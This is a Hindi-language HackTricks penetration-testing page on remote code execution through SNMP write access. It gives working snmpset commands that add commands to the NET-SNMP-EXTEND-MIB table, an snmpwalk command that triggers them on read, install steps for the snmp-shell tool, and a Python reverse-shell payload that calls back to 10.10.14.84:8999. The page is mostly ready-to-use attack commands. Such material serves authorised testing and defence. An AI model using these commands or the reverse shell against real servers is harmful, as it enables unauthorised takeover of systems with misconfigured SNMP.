SNMP RCE

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!

HackTricks का समर्थन करने के अन्य तरीके:

SNMP RCE

एसएनएमपी को हमला किया जा सकता है एक हमलावर द्वारा अगर प्रशासक उसकी डिफ़ॉल्ट विन्यास को उपकरण या सर्वर पर नजरअंदाज करता है। लिनक्स ऑपरेटिंग सिस्टम पर SNMP समुदाय का दुरुपयोग करके लिखने की अनुमति (rwcommunity) द्वारा हमलावर सर्वर पर कमांड निष्पादित कर सकता है।

अतिरिक्त कमांड के साथ सेवाएं विस्तारित करना

SNMP सेवाओं को विस्तारित करने और अतिरिक्त कमांड जोड़ने के लिए, नए "nsExtendObjects" तालिका में पंक्तियों को जोड़ना संभव है। इसे snmpset कमांड का उपयोग करके और निर्धारित पैरामीटर प्रदान करके प्राप्त किया जा सकता है, जिसमें कार्यात्मक के लिए पूर्ण पथ और निष्पादित करने वाला कमांड शामिल है:

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c c0nfig localhost \
'nsExtendStatus."evilcommand"' = createAndGo \
'nsExtendCommand."evilcommand"' = /bin/echo \
'nsExtendArgs."evilcommand"' = 'hello world'

निष्पादन के लिए कमांड इंजेक्ट करना

SNMP सेवा पर चलाने के लिए कमांड इंजेक्ट करने के लिए कॉल किए गए बाइनरी/स्क्रिप्ट की मौजूदगी और निष्पादनीयता की आवश्यकता होती है। NET-SNMP-EXTEND-MIB निष्पादनीय तकनीक के लिए पूर्ण पथ प्रदान करने की अनिवार्यता है।

इंजेक्ट किए गए कमांड के निष्पादन की पुष्टि के लिए, snmpwalk कमांड का उपयोग SNMP सेवा की जांच के लिए किया जा सकता है। आउटपुट कमांड और इसके संबंधित विवरणों को प्रदर्शित करेगा, पूर्ण पथ सहित:

snmpwalk -v2c -c SuP3RPrivCom90 10.129.2.26 NET-SNMP-EXTEND-MIB::nsExtendObjects

इंजेक्टेड कमांड चलाना

जब इंजेक्टेड कमांड पढ़ा जाता है, तो यह निष्पादित होता है। इस व्यवहार को run-on-read() के रूप में जाना जाता है। कमांड का निष्पादन snmpwalk पढ़ते समय देखा जा सकता है।

SNMP के साथ सर्वर शैल को प्राप्त करना

सर्वर पर नियंत्रण प्राप्त करने और एक सर्वर शैल प्राप्त करने के लिए, mxrch द्वारा विकसित एक पायथन स्क्रिप्ट का उपयोग किया जा सकता है, जो https://github.com/mxrch/snmp-shell.git से उपयोग किया जा सकता है।

वैकल्पिक रूप से, एक रिवर्स शैल हाथ से बनाया जा सकता है जिसे SNMP में एक विशिष्ट कमांड इंजेक्ट करके त्रिगुणित किया जा सकता है। यह कमांड, snmpwalk द्वारा प्रेरित किया जाता है, एक रिवर्स शैल कनेक्शन स्थापित करता है जो हमले करने वाले के मशीन से आक्रमणकर्ता को नियंत्रण प्रदान करता है। आप इसे चलाने के लिए पूर्व-आवश्यकता स्थापित कर सकते हैं:

sudo apt install snmp snmp-mibs-downloader rlwrap -y
git clone https://github.com/mxrch/snmp-shell
cd snmp-shell
sudo python3 -m pip install -r requirements.txt

या एक रिवर्स शैल:

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c SuP3RPrivCom90 10.129.2.26 'nsExtendStatus."command10"' = createAndGo 'nsExtendCommand."command10"' = /usr/bin/python3.6 'nsExtendArgs."command10"' = '-c "import sys,socket,os,pty;s=socket.socket();s.connect((\"10.10.14.84\",8999));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")"'

संदर्भ

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)!

HackTricks का समर्थन करने के अन्य तरीके:

Last updated